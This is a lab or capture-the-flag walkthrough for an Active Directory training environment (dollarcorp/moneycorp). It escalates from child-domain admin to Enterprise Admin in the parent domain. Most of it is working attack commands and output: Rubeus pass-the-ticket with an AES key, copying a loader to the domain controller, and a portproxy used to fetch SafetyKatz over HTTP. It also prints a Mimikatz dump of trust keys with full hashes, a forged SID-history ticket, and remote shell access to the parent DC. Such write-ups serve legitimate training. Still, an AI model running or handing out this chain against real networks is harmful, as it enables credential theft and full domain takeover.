Learning Object 18
1 – Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key
Flag 29 [Student VM] – SID history injected to escalate to Enterprise Admins 🚩
We need the trust key for the trust between dollarcorp and moneycrop, which can be retrieved using Mimikatz or SafetyKatz.
Start a process with DA privileges. Run the below command from an elevated command prompt:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Run the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

mimikatz(commandline) # lsadump::evasive-trust /patch
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 4/18/2025 9:04:35 PM - CLEAR - 1a 5f 93 d7 72 ef 03 2a 0f e3 9c 22 ee 65 3f c2 bb 11 51 1d d0 3c 7a fc 91 05 79 cb 2e 27 43 11 67 a8 18 e0 24 0b aa c1 71 0f e4 dc 0c b3 66 84 79 c2 74 f6 b0 88 49 19 90 ea f3 0c 02 1e 59 97 3f aa 42 a9 66 cf 9d a8 bc a4 aa 98 b4 d4 29 c3 aa a8 5e 5a ae 0f 93 21 51 6d fd ff a8 2f da cd 8c 3c fc 4c 1d 2f 51 c4 2e 89 01 20 29 2d 9d c7 40 d5 c7 1d 19 3c 38 38 94 3f 5b 67 a6 e6 68 4b 74 a2 a3 0d 44 0c dd 62 45 e7 01 46 83 0b 15 1d af 5f 0c 81 1e b8 ac eb 6f f2 79 fd 1f db af df cc 28 72 3d 50 a0 e8 50 62 57 22 64 c8 de fe 55 ef 94 b8 1f 54 76 65 7e 8c 0a a4 1b f6 45 03 1f 78 9f 1c de cf 52 c9 34 d2 c9 a1 f9 63 23 43 7a 25 f0 1d a8 b8 9d 25 44 f3 f7 c9 4d e5 2f 88 f9 1d c5 b3 62 59 bf ba e9 ea 97 f5 fb bb a1 82 a2
* aes256_hmac 6ebf48c7d7ad99b143c9b6ad518396606a395a60dc4165e83233a1c0c5716412
* aes128_hmac 7217c5114ba08994c10edf30106e5ce8
* rc4_hmac_nt 5f8e757822d6f6f2977af2dc94135713
[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 11:05:00 PM - CLEAR - 75 a4 95 49 95 c5 3d 16 51 d6 dd ea 1b 5e ef a4 e1 4a a4 f6 ad de 59 dd 44 23 8d f7 26 68 e6 4e 6f 47 4c c5 88 ac 28 82 44 2d c4 3d 93 5a 81 d4 1a 59 f5 19 c4 b7 c4 02 8e e6 b7 af 93 2a b9 e3 8d 6c 69 fa bf 89 f7 1b ed 62 7c cf 58 0c 39 9c 5c 81 7d aa 5c f9 83 c8 8e 99 0f 80 db 04 be 05 59 b9 17 23 14 c2 30 69 a5 97 45 98 29 18 bf da ee 67 4b 82 80 ba 46 03 78 ce 7a 25 ea 48 cb 07 c8 8e b4 f2 75 c4 45 47 6e 74 59 5d 95 7a 46 3a a8 87 27 9a 09 4f bd 0e 21 6a 01 a7 3e 6d 30 31 fc f0 e3 00 80 27 96 e6 95 d5 8a 60 71 22 f8 d8 6e 6f f9 5c 31 50 00 ee b6 d2 2f e7 82 97 aa 14 d0 32 07 8a 38 87 66 47 f6 33 3c 34 71 8f 7c f0 8c 79 30 84 35 6c 04 cd 06 fd ed 9f 4a 10 56 6d f1 4d b9 90 45 c8 25 41 a9 7f 15 a8 ea 5b a4 42
* aes256_hmac 1be6d20275db04c936e2280d803afaf58aca9aabe04664db9484c20206590a0a
* aes128_hmac ceb4bb60cc4546c039ca70454cf27321
* rc4_hmac_nt 9e01158873ab48589848840d3b4f5ba3
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 4/18/2025 9:02:53 PM - CLEAR - ac bd a9 e1 65 26 f5 3a 41 c9 e5 72 33 d1 f0 41 9b 84 d9 8f 35 01 a2 02 76 a0 79 2c a8 a0 82 19 6f d5 cf 43 94 cd df e0 21 c3 00 5b b3 cc b7 ac a1 f1 2e bf 74 91 7d f7 e4 ee 11 86 32 aa 0f 8d dc ce fb 3d 88 e8 12 1e 89 4e 24 05 ce 7f 42 bb dd ed e5 07 46 cc 12 2d b3 5c 06 e3 ca b0 9e 8e c0 b5 f3 77 29 12 86 68 b7 c8 15 04 65 49 04 da cf 0c 9d 52 3c df e5 c2 68 d8 a1 95 22 89 7d f5 4a 00 be 42 02 2d 24 42 8e 76 89 9b c6 05 f2 02 04 95 5d 21 55 a4 46 bc 80 26 b3 ef b8 66 80 9c f3 de 96 62 53 ec 41 d5 d9 7f 87 31 65 74 01 19 35 c9 f6 a8 5c 36 ef ea 70 27 aa b5 f2 2f 75 f1 37 9b d5 8e 94 94 36 e9 2f 3c a5 96 bc 4b ca 62 cd 7d ef c5 0c 78 2a d5 97 4b 46 74 5c 95 11 63 ee 06 8d f4 d7 e8 df c7 4a fe 61 2a 5e d5 f5 bd
* aes256_hmac 81bd8c045f76d05865b297d68a97a264e7293a2859cd90fbf72d288e44704f8e
* aes128_hmac 8791c8a4a72eb4cd025bbda1a1dbb925
* rc4_hmac_nt c3f0bd731f242a1c1e3d2f2409d2e2df
[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 11:05:00 PM - CLEAR - f5 ec 63 70 27 4e 2d 3b c9 cf d2 5c aa 42 3f 9e 84 43 1f ad ef 68 6f c0 0e ca 08 9f ee 7e a5 98 15 ca 17 70 e9 ee a5 02 b3 50 f5 9c fe 29 2c c1 f4 96 d3 7b f0 21 62 6b eb 3b 54 bc a3 90 99 e1 d4 1a 1a 0b 97 f1 bf d5 78 da 7e d0 cb 61 77 03 c2 08 c7 9f 9a 86 64 7b a1 0b 98 3c ba 99 bf 14 83 ff c5 f9 37 cb 1a c2 a8 1c 28 85 be 07 93 11 cb cc 35 88 5c 34 e5 d9 a1 0f ad 32 f5 e8 11 07 42 14 be 76 c3 fe 3a 77 a8 04 4c 17 ff 93 19 d0 70 ec c2 c9 0d 00 3b 2d 32 d9 d5 cc 1e f2 e0 f6 46 56 f8 cf 9c 2c 51 d8 15 f9 cd 0c d2 10 92 a8 75 af 26 8c 05 05 64 d1 be 58 03 65 3f c3 ed cd 63 05 ca 20 08 b7 09 d8 22 41 e0 a0 f7 2b 71 b7 48 ae c5 23 5b 50 d4 bf 15 a0 d4 a0 37 7d f3 d4 e3 77 93 e9 21 28 71 3d ad 9c fd 23 ce 6c 00 5d
* aes256_hmac 8a1e8a22021baf33cf5c186b2b257cace73088402e11545ede9c112545b6c05f
* aes128_hmac f97130aff8d849fa56b61a80d77492b0
* rc4_hmac_nt e1ff686c5ac2880aaecb34a8c8db19ee
Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:10:07 PM - CLEAR - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
* aes256_hmac 0d13893ad9375052e55276afd3aa59eee6ac13ecbb34ec595551a22850e5a21f
* aes128_hmac 1f367d7f4a602f7db49b28e8954e38b3
* rc4_hmac_nt 10abed140ecd1d7926fd8ed52141a4a9
[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:10:07 PM - CLEAR - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
* aes256_hmac 677e0e1d4b663a16d24f8b8463d23e21a4ee23d2dab509221bf3444a95902fa1
* aes128_hmac 54713b68042823a0d642e3c8b55f2bf3
* rc4_hmac_nt 10abed140ecd1d7926fd8ed52141a4a9
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:57 PM - CLEAR - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
* aes256_hmac d006160aeebee4bc4736932b02e2021e58e712bb614809a9e5d7a885c830ebf3
* aes128_hmac 99e79607dc6c200854a32f6421f80e6c
* rc4_hmac_nt f3f9994ce98686f98d1dd8b81ec8f2cc
[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:57 PM - CLEAR - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
* aes256_hmac 391de5a8a239c71f684355e04665f636c4b412caf5b89d7d1940e06a5a47d101
* aes128_hmac d39fd719f0a4e95b7b2a5c39d1c7feb2
* rc4_hmac_nt f3f9994ce98686f98d1dd8b81ec8f2cc
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 5/18/2025 10:03:52 PM - CLEAR - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
* aes256_hmac b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
* aes128_hmac e0923c5d48609d5521de83fc02ec3e4b
* rc4_hmac_nt 348f49cf83691a35ea71980994f02170
[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:52 PM - CLEAR - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
* aes256_hmac b0f0a55ada2dfc87111ddbdc4072a8cc8679f4a5f79242f6510c57df0a65c831
* aes128_hmac 65770a68dff396a49468fe35cbc98cbe
* rc4_hmac_nt 348f49cf83691a35ea71980994f02170
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 5/16/2025 9:04:55 PM - CLEAR - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
* aes256_hmac 3b0cc0612e0bed52b403f6048bc4cd86233bb75a2848aa6d24385e9b61fad2b1
* aes128_hmac 0c32942d43e18125da040ada11ee8d5e
* rc4_hmac_nt 4e8f18911392c26d05bc7044914a6d57
[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/16/2025 9:04:55 PM - CLEAR - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
* aes256_hmac 7a4cd11bc3ce3f83c5788e7dfe1e9bdd5c0187e2a793f9134e3bc1241497f7fb
* aes128_hmac aaaba3a50e251cbafda5bf205e9dd7ec
* rc4_hmac_nt 4e8f18911392c26d05bc7044914a6d57
Let’s Forge a ticket with SID History of Enterprise Admins. Run the below command into a new shell:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:5f8e757822d6f6f2977af2dc94135713 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

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
Copy the base64 encoded ticket from above and use it in the following command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket: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
Once the ticket is injected, we can access mcorp-dc:
winrs -r:mcorp-dc.moneycorp.local cmd

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:5f8e757822d6f6f2977af2dc94135713 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
SID history injected to escalate to Enterprise Admins in details to forge a ticket with SID History of Enterprise Admins is: S-1-5-21-335606122-960912869-XXXXXXXXXXXXXXXXXX